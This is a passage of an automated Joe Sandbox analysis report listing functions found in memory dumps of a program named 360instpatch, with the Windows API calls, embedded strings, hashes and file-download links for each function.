                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTemp_memset$CountDeleteH_prolog3NamePathTick_malloc_wcsnlen
                                                                                                                                                                                                              • String ID: !@tmpini%^&$?rd=%d
                                                                                                                                                                                                              • API String ID: 431327915-4013382025
                                                                                                                                                                                                              • Opcode ID: c6b713a1dae379f2ea82cce95f81647e3b775d2cf2f4e64eba859369c7131da5
                                                                                                                                                                                                              • Instruction ID: 12828dc19bf8b872b352b2105a2db5b02ac888d02bbd445780b6e658d3ae2a04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6b713a1dae379f2ea82cce95f81647e3b775d2cf2f4e64eba859369c7131da5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F21E032A042189BDB24E7A4DC42FFEB7E5AF54310F5404ACF22AA72C2CF7069448715
                                                                                                                                                                                                              Function 6BF32F93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF32F9A
                                                                                                                                                                                                              • htonl.WS2_32(?), ref: 6BF32FAD
                                                                                                                                                                                                                • Part of subcall function 6BEFB865: _memset.LIBCMT ref: 6BEFB896
                                                                                                                                                                                                                • Part of subcall function 6BEFB865: __swprintf.LIBCMT ref: 6BEFB8BB
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF32FF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Stunt Dns resolve: %s:%d, xrefs: 6BF32FD7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountH_prolog3Tick__swprintf_memsethtonl
                                                                                                                                                                                                              • String ID: Stunt Dns resolve: %s:%d
                                                                                                                                                                                                              • API String ID: 2444062366-1183633912
                                                                                                                                                                                                              • Opcode ID: bbec16f59db3b2a106628b1668cd3a1875e2a426fe2c8a11c34038e00ba86147
                                                                                                                                                                                                              • Instruction ID: 54638ac836764fe0eec4024eb49b0bc00218d6f0c73687960b5ba2618821361c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbec16f59db3b2a106628b1668cd3a1875e2a426fe2c8a11c34038e00ba86147
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A41101B75402159BEB24DFB8C802BA977F1EF18718F24001AE054D72B0EB3AE940CBE1
                                                                                                                                                                                                              Function 6BF055B1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF04E4F: __EH_prolog3_GS.LIBCMT ref: 6BF04E56
                                                                                                                                                                                                                • Part of subcall function 6BF23F0C: _memset.LIBCMT ref: 6BF23F3E
                                                                                                                                                                                                                • Part of subcall function 6BF23F0C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23F59
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6BF055EC
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6BF055FC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _IsHaveEntClient:%d, xrefs: 6BF055BD
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 6BF05606
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent$H_prolog3__memsetwvnsprintf
                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Internet Settings$_IsHaveEntClient:%d
                                                                                                                                                                                                              • API String ID: 1875430345-55523219
                                                                                                                                                                                                              • Opcode ID: ee46659ac8a93422fd01c9072e334dc99a6e752a4390fc732a0c8c165f7cec5f
                                                                                                                                                                                                              • Instruction ID: 9b76daec331e111985ff8c8a18cc672edef5ba980385445d7161b34b57be7928
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee46659ac8a93422fd01c9072e334dc99a6e752a4390fc732a0c8c165f7cec5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3F0AF728016097BC7209F768C45DE7BBFCEFD2B58751085EF29952120DF3964008674
                                                                                                                                                                                                              Function 6BEFAE8B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSCEnumProtocols.WS2_32(00000000,00000000,00000000,?), ref: 6BEFAEA0
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6BEFAEBD
                                                                                                                                                                                                              • WSCEnumProtocols.WS2_32(00000000,00000000,00000000,?), ref: 6BEFAED0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnumProtocols$AllocGlobal
                                                                                                                                                                                                              • String ID: G'
                                                                                                                                                                                                              • API String ID: 1234177745-1542159958
                                                                                                                                                                                                              • Opcode ID: 7dca7555523beaa3a700daf5cfc073cb85830def1c4f54587ea98fa07530ec37
                                                                                                                                                                                                              • Instruction ID: a4988e5965b33a977a706b8263b715d5cbac610a9f01cd5f23ef28ab04c0cd24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dca7555523beaa3a700daf5cfc073cb85830def1c4f54587ea98fa07530ec37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2F03076941118BADB01CBA4CC46FDE7BBCEB04369F100292E605E61D0D7749A44D7A1
                                                                                                                                                                                                              Function 6BF2C5DF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33windowCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF2C5EA
                                                                                                                                                                                                              • SendMessageW.USER32(6BFCC3F0,?,?,?), ref: 6BF2C5FC
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF2C604
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s, xrefs: 6BF2C61D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$MessageSend_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s
                                                                                                                                                                                                              • API String ID: 3817034548-3777656696
                                                                                                                                                                                                              • Opcode ID: 912914a306f0a05a43aea4724045b9cd27d9826905659e4fa49b945809a8c329
                                                                                                                                                                                                              • Instruction ID: 328c3091080477b248a05f1e5d04882270b2feee76def02df2ced7c5ef9dfe67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 912914a306f0a05a43aea4724045b9cd27d9826905659e4fa49b945809a8c329
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0EC379102129FD7419EB98C44C9BBEA7DFD8250F05482BF544C2171DA76CC699662
                                                                                                                                                                                                              Function 6BF02447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0244B
                                                                                                                                                                                                                • Part of subcall function 6BF02364: _malloc.LIBCMT ref: 6BF02387
                                                                                                                                                                                                                • Part of subcall function 6BF02364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF0239D
                                                                                                                                                                                                                • Part of subcall function 6BF02364: _malloc.LIBCMT ref: 6BF023B3
                                                                                                                                                                                                                • Part of subcall function 6BF02364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF023C8
                                                                                                                                                                                                                • Part of subcall function 6BF02364: _memset.LIBCMT ref: 6BF023EF
                                                                                                                                                                                                                • Part of subcall function 6BF02364: __snwprintf.LIBCMT ref: 6BF02416
                                                                                                                                                                                                              • __snwprintf.LIBCMT ref: 6BF02475
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NetworkParams__snwprintf_malloc$CountTick_memset
                                                                                                                                                                                                              • String ID: http://%s/wpad.dat$wpad
                                                                                                                                                                                                              • API String ID: 140397255-1948369278
                                                                                                                                                                                                              • Opcode ID: 941555f83709cc6941f6929550cdfa3613640723feea0d45cb0460bd7dc3e335
                                                                                                                                                                                                              • Instruction ID: 22c7e9802aa18f6db36acb1b381490364c52c43f77a4905fd40db3d7eb5c8654
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 941555f83709cc6941f6929550cdfa3613640723feea0d45cb0460bd7dc3e335
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E0C233518322A7D760AA365C09C6FBE99FFD53A0B090859F99493132EB2AC416D2B1
                                                                                                                                                                                                              Function 6BF2E488 Relevance: 6.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 6BF2E70D
                                                                                                                                                                                                                • Part of subcall function 6BF2CDE8: PostQuitMessage.USER32(00000000), ref: 6BF2CECB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3873111417-0
                                                                                                                                                                                                              • Opcode ID: 682a6dd7eb560b5fceaacae75d093caa556b59f7c5fa3c134a049ba6ca0cad4d
                                                                                                                                                                                                              • Instruction ID: 33030a19eafcfcac5507f91b1ee8b0545e746afc0f2b01b8af4e6e5b77c121c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 682a6dd7eb560b5fceaacae75d093caa556b59f7c5fa3c134a049ba6ca0cad4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35819576A21606DBDF24CFF4C991AAF77B5EF48310F200419EA56D72A0E738D941CBA1
                                                                                                                                                                                                              Function 00B34994 Relevance: 6.2, APIs: 4, Instructions: 158filethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDeleteFileH_prolog3Thread__wcsicoll
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3249433508-0
                                                                                                                                                                                                              • Opcode ID: 9cd2ebca592f36ff74c97ee816bb49e7c1aaf2072afb197316f628fcdc9fdfa0
                                                                                                                                                                                                              • Instruction ID: 4f308d5126250dda521a83d20ecdd74136ee1052b31bfff9e8fd19d72af63964
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cd2ebca592f36ff74c97ee816bb49e7c1aaf2072afb197316f628fcdc9fdfa0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6851BD31800219DBCF26EFA4DC92BEEB7F5FF04301F2044ADE84662192EB70A985DB51
                                                                                                                                                                                                              Function 00B7E697 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7E69E
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00BDE544,0000005C,00000008,00B7E838,?,?,0000002C), ref: 00B7E75E
                                                                                                                                                                                                              • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,0000002C), ref: 00B7E76B
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0000002C), ref: 00B7E7B5
                                                                                                                                                                                                                • Part of subcall function 00B1DFB0: __CxxThrowException@8.LIBCMT ref: 00B1DFC2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectoryErrorException@8ExistsFileH_prolog3LastPathThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3549841302-0
                                                                                                                                                                                                              • Opcode ID: 336520ab35ba583f0fdb89567a85b086e0ab3deb5b35023a92c3f8cf6ce903dd
                                                                                                                                                                                                              • Instruction ID: 002a9b13b5fa0ea4757a63750a6c57ce092ad970cb7c79be184908067e10843d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 336520ab35ba583f0fdb89567a85b086e0ab3deb5b35023a92c3f8cf6ce903dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3731E4305001159ACF2CEF64C89AABE77E5EF65304F9085E9F4399B290DB30DD80D751
                                                                                                                                                                                                              Function 00B7A606 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00B7A689
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00B7A69E
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B7A6CA
                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00B7A6DF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSelect$CompatibleCreateDelete
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 488333989-0
                                                                                                                                                                                                              • Opcode ID: 2f9fbab6aa4eee7c8852f6c4c80f47c763368aa699c919bb424e1ff98c9d8a64
                                                                                                                                                                                                              • Instruction ID: 34c16b4100735f54f82bdbf0312cb467b7ccfb664299770d1fd7168545e8e232
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f9fbab6aa4eee7c8852f6c4c80f47c763368aa699c919bb424e1ff98c9d8a64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B531E271900109EFDF11AFA0CC41DEE7BB9FF48304F048159FA29A2261DB31DA65DB91
                                                                                                                                                                                                              Function 6BF305F0 Relevance: 6.1, APIs: 4, Instructions: 76threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF305F7
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF3060C
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BFCC570), ref: 6BF30619
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BFCC570), ref: 6BF306D4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnterH_prolog3LeaveThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1021104131-0
                                                                                                                                                                                                              • Opcode ID: 6ee60854bbf6c261913fe90c92258f56d92fc4fe844e9c17b5421e99bc466917
                                                                                                                                                                                                              • Instruction ID: 74c74c54d4995f5f1f056c3e0d7d6ac628dacaef947436dd4cd1355dc3f797bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ee60854bbf6c261913fe90c92258f56d92fc4fe844e9c17b5421e99bc466917
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6315C72A50312CFD780DFB9C54575A77E0AB89B04F01846AD549CB3B0EBB9D885CB94
                                                                                                                                                                                                              Function 00B280FC Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B28116
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00B2813D
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00B28158
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00B2815F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
